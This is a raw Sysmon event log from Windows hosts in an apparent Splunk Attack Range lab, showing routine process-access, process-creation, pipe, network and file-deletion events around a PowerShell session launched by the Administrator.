21:43:48.231{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885476C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149683Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.231{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885476C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149682Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.231{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885476C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149681Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.216{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149680Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.216{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149679Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.216{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149678Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.216{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149677Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.132{39BD8DE3-0F65-60CA-1600-00000000D101}1164476C:\Windows\system32\svchost.exe{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149676Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.132{39BD8DE3-0F65-60CA-1600-00000000D101}11641220C:\Windows\system32\svchost.exe{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149675Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.132{39BD8DE3-7094-60CA-070D-00000000D101}53246676C:\Windows\system32\conhost.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149674Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.100{39BD8DE3-0FD7-60CA-7D00-00000000D101}21002896C:\Windows\system32\csrss.exe{39BD8DE3-7094-60CA-070D-00000000D101}5324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149673Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.085{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149672Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.085{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149671Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.085{39BD8DE3-0FD7-60CA-7D00-00000000D101}21002896C:\Windows\system32\csrss.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149670Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.085{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149669Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.085{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149668Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.084{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881060C:\Windows\Explorer.EXE{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\windows.storage.dll+11a32|C:\Windows\System32\windows.storage.dll+11729|C:\Windows\System32\windows.storage.dll+115ff|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHLWAPI.dll+e1f7 154100x8000000000000000149667Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.079{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Administrator\WIN-HOST-14\Administrator{39BD8DE3-0FD9-60CA-F738-070000000000}0x738f72HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\explorer.exeC:\Windows\Explorer.EXE 10341000x8000000000000000149666Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.032{39BD8DE3-0F65-60CA-1600-00000000D101}1164476C:\Windows\system32\svchost.exe{39BD8DE3-7093-60CA-050D-00000000D101}5488C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149665Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.032{39BD8DE3-0F65-60CA-1600-00000000D101}11641220C:\Windows\system32\svchost.exe{39BD8DE3-7093-60CA-050D-00000000D101}5488C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000149664Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:45.885{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58339-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104537Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:49.528{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C786F62D9E1CC319EA2AE2BA17E14C51,SHA256=582D2C9E7393B922FF27E3D8B1872FB0E43514F48141E29079CE16BE72FD6B92,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149846Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:49.710{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149845Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:49.707{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000149844Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-CreatePipe2021-06-16 21:43:49.567{39BD8DE3-7094-60CA-060D-00000000D101}5472\PSHost.132683534280793256.5472.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000149843Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:49.554{39BD8DE3-7094-60CA-060D-00000000D101}5472WIN-HOST-14\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_c4o0kuej.0oz.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149842Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:49.553{39BD8DE3-7094-60CA-060D-00000000D101}5472WIN-HOST-14\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_syrsg3cw.w24.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000149841Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:49.336{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_syrsg3cw.w24.ps12021-06-16 21:43:49.336 10341000x8000000000000000149840Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:49.317{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-7094-60CA-060D-00000000D101}5472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149839Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:49.074{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0752E4327E5C11BD0EB363FC6732273B,SHA256=05D240D5F38EBAA43B912040E5C8679A9A3A3D30A938B0D026BCD1D046F8BAC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149838Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:49.073{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A44023F9CED154EBC331D81CC167416,SHA256=5577487BB92AA8C1A8746FB1F4BECD28F99A995A98A7D666BFF8362E726139C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104538Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:50.892{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B51F70F43EB4E68CD016D5C94C1857A,SHA256=8C573F0764299A3B5F4609CEA91B7082B5AA77D75FBED567F6B605CB4C9666FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149849Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:50.383{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=926715032D91628D3CF196E3B8236B92,SHA256=3E7846EDA648B4BBE5FA2D7C4625A6684B8B6DDA72525DA6367381E73859EF9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149848Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:50.360{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D8EC49F3C61DC79617A2045E0D9D337F,SHA256=94C37C0A3BAB54116140E5C4EDC6F99FE5793BA063EB5F91D958200382608CCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149847Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:50.097{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B760D8742E2538B6B9764E6A194AD54D,SHA256=117495CF8BB265D4E3973A64C5E8476D4935486268842BCF0E27E468DD54A8AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149850Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:51.105{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71FE538E15840889E98722FAAD31A827,SHA256=C276D2FB6B60AFE7598F8326E7EECE11C6EA0B6C8C72DE5FFD32B74685547EB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104539Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:52.258{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=655DA9FBCBF87B9C1CC1CF80EF2E8AEA,SHA256=06F5C78704ACBA925BCB0C8303BC2AE903E083233AA621DE69EECBFAD97AD67E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149853Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:52.169{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80BB43232516E9FD9C7A1B234362E2D5,SHA256=7971D73BE80C2B6E1C651F3DD8835E3E3635EFF35D5DD6DEF28175694D9053E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149852Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:52.119{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT 